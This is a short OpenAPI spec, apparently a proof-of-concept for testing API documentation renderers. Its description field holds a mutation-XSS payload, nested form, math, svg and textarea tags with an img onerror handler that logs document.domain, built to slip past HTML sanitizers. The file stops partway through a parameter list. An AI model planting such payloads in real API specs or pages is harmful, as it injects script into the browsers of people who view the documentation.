---
openapi: 3.0.1
info:
  title: Afine Api
  version: '1.0'
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=console.log(document.domain) src>"></form>
paths:
  "/path/malformed/by/afine":
    post:
      tags:
      - afine
      parameters:
      - name: afine
